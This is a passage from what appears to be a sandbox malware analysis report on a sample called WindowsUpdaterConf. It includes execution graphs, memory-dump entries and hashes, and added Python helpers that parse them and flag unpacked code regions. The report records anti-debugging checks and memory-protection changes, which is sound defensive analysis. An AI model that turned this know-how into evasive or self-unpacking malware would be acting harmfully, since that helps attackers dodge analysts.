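    r"^hcaresult_(?P<process>\d+)_(?P<dump>\d+)_(?P<base>[0-9A-Fa-f]+)_(?P<image>.+)\.jbxd$")
SOURCE_LINE_RE = re.compile(
    r"Source File:\s*(?P<sdmp>[^\s,]+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")
SNAPSHOT_LINE_RE = re.compile(r"Snapshot File:\s*(?P<jbxd>\S+)")


def parse_sdmp_name(name):
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised .sdmp name: {name}")
    protect = int(m["protect"], 16)
    return {
        "process": int(m["process"], 16),
        "dump": int(m["dump"], 16),
        "dump_id": m["dump_id"],
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECTIONS.get(protect & 0xFF, f"0x{protect:x}"),
        "executable": bool(protect & 0xF0),   # any PAGE_EXECUTE* value
        "writable": bool(protect & 0xCC),     # *_READWRITE or *_WRITECOPY
        "unparsed": m["rest"].split("."),     # fields this example does not decode
    }


def parse_snapshot_name(name):
    m = SNAPSHOT_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised snapshot name: {name}")
    return {"process": int(m["process"]), "dump": int(m["dump"]),
            "base": int(m["base"], 16), "image": m["image"]}


def same_region(sdmp, snapshot):
    """True when the .sdmp and .jbxd names refer to the same process, dump and base."""
    return all(sdmp[k] == snapshot[k] for k in ("process", "dump", "base"))


def looks_like_unpacked_code(sdmp, based_on_pe):
    """Heuristic: a writable+executable region not backed by a PE image is where
    a packer stages decrypted code (cf. "based on PE: false" and the 100%
    dynamic/decrypted code coverage reported above)."""
    return sdmp["executable"] and sdmp["writable"] and not based_on_pe


def parse_dump_source(entry):
    """Parse one 'Memory Dump Source' entry as it appears in the report text."""
    src, snap = SOURCE_LINE_RE.search(entry), SNAPSHOT_LINE_RE.search(entry)
    if not src or not snap:
        raise ValueError("entry lacks a Source File or Snapshot File line")
    sdmp, jbxd = parse_sdmp_name(src["sdmp"]), parse_snapshot_name(snap["jbxd"])
    offset, based_on_pe = int(src["offset"], 16), src["pe"] == "true"
    return {
        "sdmp": sdmp, "snapshot": jbxd, "offset": offset, "based_on_pe": based_on_pe,
        "consistent": same_region(sdmp, jbxd) and offset == sdmp["base"],
        "unpacked_code": looks_like_unpacked_code(sdmp, based_on_pe),
    }


# Constructed sample: one entry copied from the report above.
SAMPLE_ENTRY = """Memory Dump Source
• Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
"""

if __name__ == "__main__":
    e = parse_dump_source(SAMPLE_ENTRY)
    print(f"process {e['sdmp']['process']} dump {e['sdmp']['dump']} base {e['sdmp']['base']:#x} "
          f"{e['sdmp']['protect_name']} image={e['snapshot']['image']} "
          f"consistent={e['consistent']} unpacked_code={e['unpacked_code']}")
```

The protection field is decoded with the winnt.h PAGE_* constants, so a dump from a PAGE_READONLY or image-backed region is reported as not looking like unpacked code; run over every entry in a report, the helper picks out the private RWX regions worth carving for the decrypted payload.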

                                                                                          Execution Graph

                                                                                          Execution Coverage:9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph (node: id address [API]; edge: src->dst)
                                                                                          5336 1720850
                                                                                          5337 1720859   5336->5337
                                                                                          5340 1723be2   5336->5340
                                                                                          5343 17234bd   5336->5343
                                                                                          5346 17288c0   5340->5346
                                                                                          5345 17288c0 VirtualProtect   5343->5345
                                                                                          5344 17234d6   5345->5344
                                                                                          5348 17288d3   5346->5348
                                                                                          5350 1728970   5348->5350
                                                                                          5351 17289b8 VirtualProtect   5350->5351
                                                                                          5353 1723bf8   5351->5353
                                                                                          5354 1728b40
                                                                                          5355 1728b80 CloseHandle   5354->5355
                                                                                          5357 1728bb1   5355->5357
                                                                                          5358 60d2c50
                                                                                          5359 60d2c6e   5358->5359
                                                                                          5362 60d2dd0   5359->5362
                                                                                          5366 60d2e08   5362->5366
                                                                                          5369 60d2e03   5362->5369
                                                                                          5363 60d2cbb
                                                                                          5367 60d2e4c CheckRemoteDebuggerPresent   5366->5367
                                                                                          5368 60d2e8e   5367->5368   5368->5363
                                                                                          5370 60d2e4c CheckRemoteDebuggerPresent   5369->5370
                                                                                          5371 60d2e8e   5370->5371   5371->5363
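The execution graph above, and the control-flow graphs that follow, are printed as a single run of tokens. The Python below is an added example, not part of the Joe Sandbox report, that parses both layouts into nodes and edges (handling the control_flow_graph lines as well goes beyond the execution graph shown here), summarises which Win32 APIs are reached at which addresses, and returns the path from the graph's entry node to each API call. The token rules are an assumption inferred from the text on this page: a decimal node id, a hex address or start-end range, optional annotations that are either "call <addr>" or a bare API name, and "src->dst" edges; the sample graphs are copied from this section.

```python
"""Parse the text graphs Joe Sandbox prints in this report ("execution_graph ..."
and "control_flow_graph ...") and list the APIs reached, where, and by which path.

Added example, not part of the report or of Joe Sandbox. Token rules are an
assumption inferred from the page: node = "<decimal id> <hex addr>[-<hex addr>]"
followed by optional "call <hex addr>" / API-name annotations; edge = "<src>-><dst>".
"""
from collections import deque
from dataclasses import dataclass, field

# Sample inputs, copied from the report's Execution Graph and two Control-flow
# Graph entries (embedded here as constructed string literals).
EXECUTION_GRAPH = (
    "execution_graph 5336 1720850 5337 1720859 5336->5337 5340 1723be2 5336->5340 "
    "5343 17234bd 5336->5343 5346 17288c0 5340->5346 5345 17288c0 VirtualProtect "
    "5343->5345 5344 17234d6 5345->5344 5348 17288d3 5346->5348 5350 1728970 "
    "5348->5350 5351 17289b8 VirtualProtect 5350->5351 5353 1723bf8 5351->5353 "
    "5354 1728b40 5355 1728b80 CloseHandle 5354->5355 5357 1728bb1 5355->5357 "
    "5358 60d2c50 5359 60d2c6e 5358->5359 5362 60d2dd0 5359->5362 5366 60d2e08 "
    "5362->5366 5369 60d2e03 5362->5369 5363 60d2cbb 5367 60d2e4c "
    "CheckRemoteDebuggerPresent 5366->5367 5368 60d2e8e 5367->5368 5368->5363 "
    "5370 60d2e4c CheckRemoteDebuggerPresent 5369->5370 5371 60d2e8e 5370->5371 "
    "5371->5363"
)
CFG_WITH_CALLS = ("control_flow_graph 0 6198c18-6198c83 call 6190040 call 619bf28 "
                  "6 6198c89-619bec4 0->6")
CFG_CHECK_DEBUGGER = ("control_flow_graph 836 60d2e08-60d2e8c CheckRemoteDebuggerPresent "
                      "838 60d2e8e-60d2e94 836->838 839 60d2e95-60d2ed0 836->839 838->839")


@dataclass
class Node:
    start: int
    end: int = None                                 # None for single-address nodes
    annotations: list = field(default_factory=list)

    def apis(self):
        """Bare API names; 'call <addr>' entries are intra-module calls."""
        return [a for a in self.annotations if not a.startswith("call ")]


def parse_graph(text):
    """Return ({node_id: Node}, [(src, dst), ...]) from one graph line."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges, i = {}, [], 0
    while i < len(tokens):
        if "->" in tokens[i]:                        # edge token
            src, dst = tokens[i].split("->")
            edges.append((int(src), int(dst)))
            i += 1
            continue
        node_id = int(tokens[i])
        lo, _, hi = tokens[i + 1].partition("-")
        node = Node(int(lo, 16), int(hi, 16) if hi else None)
        i += 2
        # Annotations run until the next edge or the next node id; ids are
        # decimal, API names never are.
        while i < len(tokens) and "->" not in tokens[i] and not tokens[i].isdigit():
            if tokens[i] == "call":
                node.annotations.append(f"call {tokens[i + 1]}")
                i += 2
            else:
                node.annotations.append(tokens[i])
                i += 1
        nodes[node_id] = node
    return nodes, edges


def api_summary(nodes):
    """API name -> sorted, de-duplicated hex addresses of the nodes calling it."""
    sites = {}
    for node in nodes.values():
        for api in node.apis():
            sites.setdefault(api, set()).add(f"{node.start:x}")
    return {api: sorted(addrs) for api, addrs in sites.items()}


def api_call_paths(nodes, edges):
    """Shortest path from an entry node (no incoming edge) to every API-calling
    node: {node_id: (api_names, start_addr, [entry, ..., node_id])}."""
    succ, indeg = {}, {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
        indeg[d] = indeg.get(d, 0) + 1
    parent = {n: None for n in nodes if indeg.get(n, 0) == 0}   # BFS from all entries
    queue = deque(parent)
    while queue:
        n = queue.popleft()
        for m in succ.get(n, []):
            if m not in parent:
                parent[m] = n
                queue.append(m)
    found = {}
    for n, node in nodes.items():
        if node.apis():
            path, cur = [], n
            while cur is not None:                   # an unreachable node yields just [n]
                path.append(cur)
                cur = parent.get(cur)
            found[n] = (node.apis(), node.start, path[::-1])
    return found


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    print(len(nodes), "nodes;", api_summary(nodes))
    for apis, addr, path in api_call_paths(nodes, edges).values():
        print(f"  {'/'.join(apis)} @ {addr:x} via {' -> '.join(map(str, path))}")
```

On the execution graph it reports 24 nodes, matching the report's node count, two VirtualProtect sites (17288c0 and 17289b8) reached from entry 5336 by different paths, and CheckRemoteDebuggerPresent reached from entry 5358 on two branches (via 5366 and via 5369) that both rejoin at node 5363 (60d2cbb).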

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (node: id start-end [call target]; edge: src->dst)
                                                                                          0 6198c18-6198c83 call 6190040 call 619bf28
                                                                                          6 6198c89-619bec4   0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: 7b7202aa7c0005be3ecd7ad1daa906eafb6be0b292800482a0da1157485c6b4b
                                                                                          • Instruction ID: f6f20b909a38ba0fe9b46c20082bd6d7b9e79ca31e8fe7a3e484265f99a20523
                                                                                          • Opcode Fuzzy Hash: 7b7202aa7c0005be3ecd7ad1daa906eafb6be0b292800482a0da1157485c6b4b
                                                                                          • Instruction Fuzzy Hash: 42530D78A01219CFDB54DF64D995A9EBBF2FB88301F5081EAD809A7354DB349E85CF80

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (node: id start-end; edge: src->dst)
                                                                                          675 6194dc3
                                                                                          676 6194dc7-6194dc9   675->676
                                                                                          677 6194dca-6194dcd   676->677
                                                                                          678 6194e59-6194e67   677->678
                                                                                          679 6194dce-6194dd3   677->679
                                                                                          685 6194f7f-6194f8d   678->685
                                                                                          698 6194e6d-6194e74   678->698
                                                                                          679->678
                                                                                          680 6194e79-6194ea6   679->680
                                                                                          681 6194fdb-6194fee   679->681
                                                                                          682 6194dda-6194e14   679->682
                                                                                          683 6194f9d-6194fcb   679->683
                                                                                          684 6194e3c-6194e4d   679->684
                                                                                          679->685
                                                                                          686 619501e-6195020   679->686
                                                                                          687 6194e16-6194e29   679->687
                                                                                          688 6194eab-6194ee5   679->688
                                                                                          689 6194eea   679->689
                                                                                          690 619502c-619503e   679->690
                                                                                          691 6194e2e-6194e3a   679->691
                                                                                          692 6195040   679->692
                                                                                          680->677
                                                                                          694 6194ff0-6195002   681->694
                                                                                          682->677
                                                                                          683->689
                                                                                          717 6194fd1-6194fd6   683->717
                                                                                          684->691
                                                                                          706 6194e4f-6194e54   684->706
                                                                                          685->680
                                                                                          707 6194f93-6194f98   685->707
                                                                                          686->692
                                                                                          695 6195022-619502a   686->695
                                                                                          687->694
                                                                                          688->677
                                                                                          697 6194ef6-6194f7a   689->697
                                                                                          702 619500c-6195015   690->702
                                                                                          691->677
                                                                                          694->702
                                                                                          695->702
                                                                                          697->677
                                                                                          698->676
                                                                                          702->690
                                                                                          709 6195017   702->709
                                                                                          706->677
                                                                                          707->677
                                                                                          709->686
                                                                                          709->690
                                                                                          709->692
                                                                                          717->677
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: 21f27469bc806f7b778574a161f8e85dd689121ae9685119106f0a6cb257147d
                                                                                          • Instruction ID: 78fa8a7a0e3a259d65313528dc623a93b0dc957b423168cd3d8a73fe6961387c
                                                                                          • Opcode Fuzzy Hash: 21f27469bc806f7b778574a161f8e85dd689121ae9685119106f0a6cb257147d
                                                                                          • Instruction Fuzzy Hash: 43516374A00218CFEB799F64D9947ADBBF1FB54700F0045A9E80AAB394DB345E828F95

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (node: id start-end [API]; edge: src->dst)
                                                                                          836 60d2e08-60d2e8c CheckRemoteDebuggerPresent
                                                                                          838 60d2e8e-60d2e94   836->838
                                                                                          839 60d2e95-60d2ed0   836->839
                                                                                          838->839
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2345661782.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_60d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 1740c306b9fceaea04a2eb19cc45e472bbdc18685a4149f72ef602cd7e948460
                                                                                          • Instruction ID: 60c3566de76aade3dc0c9d9a7f5f44d56bd6f766b14fa91dd180bd0cb4e12d63
                                                                                          • Opcode Fuzzy Hash: 1740c306b9fceaea04a2eb19cc45e472bbdc18685a4149f72ef602cd7e948460
                                                                                          • Instruction Fuzzy Hash: AD2128B1C002598FCB10CF9AD885BEEFBF4AF59320F14845AE459A7350D778A944CF65

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (node: id start-end [API]; edge: src->dst)
                                                                                          830 60d2e03-60d2e8c CheckRemoteDebuggerPresent
                                                                                          832 60d2e8e-60d2e94   830->832
                                                                                          833 60d2e95-60d2ed0   830->833
                                                                                          832->833
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2345661782.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_60d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: c22180443571e1183ab9310647750f867c20156bde0761aab1a3cce48eba83e4
                                                                                          • Instruction ID: 89f0cf998ee96a92d81529cb0a9eaaa63f629d23567fe666f7c2f37ff4636116
                                                                                          • Opcode Fuzzy Hash: c22180443571e1183ab9310647750f867c20156bde0761aab1a3cce48eba83e4
                                                                                          • Instruction Fuzzy Hash: B42136B5C012598FCB10CFA9D985BEEFBF4AF58310F18845AE459E7241D3789944CF60

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (node: id start-end [API]; edge: src->dst)
                                                                                          842 1728970-17289f1 VirtualProtect
                                                                                          845 17289f3-17289f9   842->845
                                                                                          846 17289fa-1728a1f   842->846
                                                                                          845->846
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 017289E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2280995766.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_1720000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 66532cbcca74a4fb4127d1995d682d140b9a6c8c71a48cef0dda9f43b3001021
                                                                                          • Instruction ID: bf51f3f6bdf39fb53ec1af440af234f1bfea56c0d7016ddc7d095413c6c84853
                                                                                          • Opcode Fuzzy Hash: 66532cbcca74a4fb4127d1995d682d140b9a6c8c71a48cef0dda9f43b3001021
                                                                                          • Instruction Fuzzy Hash: 201136B1D002498FDB10DFAAC881ADEFBF4FF98320F14842AD459A7210C775A900CFA1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 1077 619bf50-619bf74 1078 619bfdc-619bfe3 1077->1078 1079 619bf76-619bfd4 1077->1079 1080 619bfe5-619c019 1078->1080 1081 619c056-619c067 1078->1081 1079->1078 1088 619c021-619c04a 1080->1088 1082 619c069 1081->1082 1083 619c06e-619c090 1081->1083 1082->1083 1091 619c0ff-619c194 call 6197550 1083->1091 1092 619c092-619c09b 1083->1092 1115 619c1fc-619c222 1088->1115 1116 619c050 1088->1116 1105 619c1b5-619c1bb 1091->1105 1095 619c0aa-619c0b0 1092->1095 1096 619c09d-619c0a2 1092->1096 1100 619c1b0 1095->1100 1101 619c0b6-619c0ba 1095->1101 1096->1095 1100->1105 1101->1091 1103 619c0bc-619c0c5 1101->1103 1107 619c0d4-619c0da 1103->1107 1108 619c0c7-619c0cc 1103->1108 1110 619c1bd 1105->1110 1111 619c1c5 1105->1111 1107->1100 1109 619c0e0-619c0fa 1107->1109 1108->1107 1109->1105 1110->1111 1111->1115 1125 619c229-619c24e 1115->1125 1126 619c224 1115->1126 1116->1081 1127 619c250-619c256 1125->1127 1126->1125 1129 619dfda-619dfde 1127->1129 1130 619c25c 1127->1130 1131 619dfe4-619dfef 1129->1131 1132 619ec87-619eca0 1129->1132 1130->1129 1131->1127 1137 619ec7e-619ec84 1132->1137 1138 619eca2-619eca7 1132->1138 1137->1132
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: b0bf832d9a8596b33098bdfb4fae5644bab52022548f343c8fcdd968e7572fab
                                                                                          • Instruction ID: 15896be7a9487d68449ed30f71ddb7b231f64247a224fec2bb40bd798120f654
                                                                                          • Opcode Fuzzy Hash: b0bf832d9a8596b33098bdfb4fae5644bab52022548f343c8fcdd968e7572fab
                                                                                          • Instruction Fuzzy Hash: 3491EE74A00200CFCB54DF69D494AAABBF2FF8A310F518569D455DB3A5DB35AC82CBE0

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2280995766.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_1720000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 1b22ed16174db1d35be3b8093f30f006dc54bfd03b6a3bad221ec55da7e295cb
                                                                                          • Instruction ID: e9c8d0ead87600c91fe1596d51efc36424a4ffca168a6889015a00485472c79b
                                                                                          • Opcode Fuzzy Hash: 1b22ed16174db1d35be3b8093f30f006dc54bfd03b6a3bad221ec55da7e295cb
                                                                                          • Instruction Fuzzy Hash: C71128B19002498FDB20DFAAC44579EFBF5AF88324F248419D519A7340C675A540CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2dfe5ab9102689c53404ceaf9deb1cb80da7e36dc5d0d3f96e9d6df420e4518c
                                                                                          • Instruction ID: c6b4371010b37a82888f95166bbaea6c3d0eb1d5644714f95d6094b2a238f9cd
                                                                                          • Opcode Fuzzy Hash: 2dfe5ab9102689c53404ceaf9deb1cb80da7e36dc5d0d3f96e9d6df420e4518c
                                                                                          • Instruction Fuzzy Hash: B85141387141549FDB88EFA6E454A6E3BE7FB88702F108569E905D7394CF389C42CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 939b1842161fbb441b1c1f1d6e33dfa8149e2fe4de8466eb7655a9a1a46eacfc
                                                                                          • Instruction ID: 0b3693642afa57515bf440c65e9d4bfdcebc186bdecda604e122ff32d0370852
                                                                                          • Opcode Fuzzy Hash: 939b1842161fbb441b1c1f1d6e33dfa8149e2fe4de8466eb7655a9a1a46eacfc
                                                                                          • Instruction Fuzzy Hash: 80319C746142098FDB09EF66E0586AE3BB7FB99701F50442AE54297394CF385D81CFD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe520ab0ea0a3e02a6271bfdfc77394118613ffbd4d2c9ad4af1efa0e93beecc
                                                                                          • Instruction ID: fc3d4ca27920f50dbe3084d2b5e969778a2fdcdb6756fca23df6d19c6bb834d9
                                                                                          • Opcode Fuzzy Hash: fe520ab0ea0a3e02a6271bfdfc77394118613ffbd4d2c9ad4af1efa0e93beecc
                                                                                          • Instruction Fuzzy Hash: 89016D74A002589FDB65DF25CC8479A77B6FF89201F0480E9A409E7315EB396E45CF25
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f4df472d27288d0f4d6ff804847e31431ec42ace34591d365bac4b78aa5ddb3
                                                                                          • Instruction ID: 945ac0125232acb6b767fea048f7f9713edcfeb1fec52b12cd2f38e1bf86b18f
                                                                                          • Opcode Fuzzy Hash: 5f4df472d27288d0f4d6ff804847e31431ec42ace34591d365bac4b78aa5ddb3
                                                                                          • Instruction Fuzzy Hash: 3CF054303242458FEB58AF62E46596A3777FB85B42B808028D403C73A4CF399C41CBE5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b685e94add85e5595e62595689355aeda3e023829f83e9c6edfdab6f92467ec
                                                                                          • Instruction ID: b3055778aa9a3da67bd2f369038566a836d960209f6d21727841c870ba3152cd
                                                                                          • Opcode Fuzzy Hash: 6b685e94add85e5595e62595689355aeda3e023829f83e9c6edfdab6f92467ec
                                                                                          • Instruction Fuzzy Hash: 13F017B4A00218CFEBA59F14D88879977B2FB49202F1041D9E50AE3354DB359E858F61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e49b7cda8403b50dc37bc5f362cfd4b7c5e14be32fbb8ee3521612188ca9f6e5
                                                                                          • Instruction ID: d83d1b7d0994cd2984c8740f96e1aa525e5e3902f9cbb860b2ba46374abbf204
                                                                                          • Opcode Fuzzy Hash: e49b7cda8403b50dc37bc5f362cfd4b7c5e14be32fbb8ee3521612188ca9f6e5
                                                                                          • Instruction Fuzzy Hash: 12E0E5B4A002189FDBA9DF15D88979DBBB6FB48301F1081DAE509A3354DB342E88CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4e5256b45cf4a542d569096833954b0603c6cd9ab8acfe81b5d7c63fabe6284
                                                                                          • Instruction ID: 6ef4bc650a817af6a39dfbceff092f416dcda1f9b0f67e27bc0f0cc91a0bdefe
                                                                                          • Opcode Fuzzy Hash: a4e5256b45cf4a542d569096833954b0603c6cd9ab8acfe81b5d7c63fabe6284
                                                                                          • Instruction Fuzzy Hash: E7D0A97180020CEBCB00EFF0D9058AEBBFCEF49210B1008EAD808D3210FE329E10AB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e713160bb554b807f2fd70a6cb880a608ab9212b9e72057cd4c41ac1a3d3aac9
                                                                                          • Instruction ID: 3ce33b34d84a88f228299da05cc4c2a329cca7e136740a21c465f6008911d4cb
                                                                                          • Opcode Fuzzy Hash: e713160bb554b807f2fd70a6cb880a608ab9212b9e72057cd4c41ac1a3d3aac9
                                                                                          • Instruction Fuzzy Hash: EFD067B4A401148FDBB49F64E8D869C76B1AB58201F5088AA960AE3294DE304E84CF14
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3301139c5a2b1683b3672ad0424fc9e7d6463dcfe631e59b26d81f708267afa4
                                                                                          • Instruction ID: ea54f293b4f0047c39f2f1c04bf85d31d8e6df969897a8ca2267ead1d0af046a
                                                                                          • Opcode Fuzzy Hash: 3301139c5a2b1683b3672ad0424fc9e7d6463dcfe631e59b26d81f708267afa4
                                                                                          • Instruction Fuzzy Hash: 8FC09B3012410C87D7056A55F45949A379FE7D9A05F410027D14507755CE346D41CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
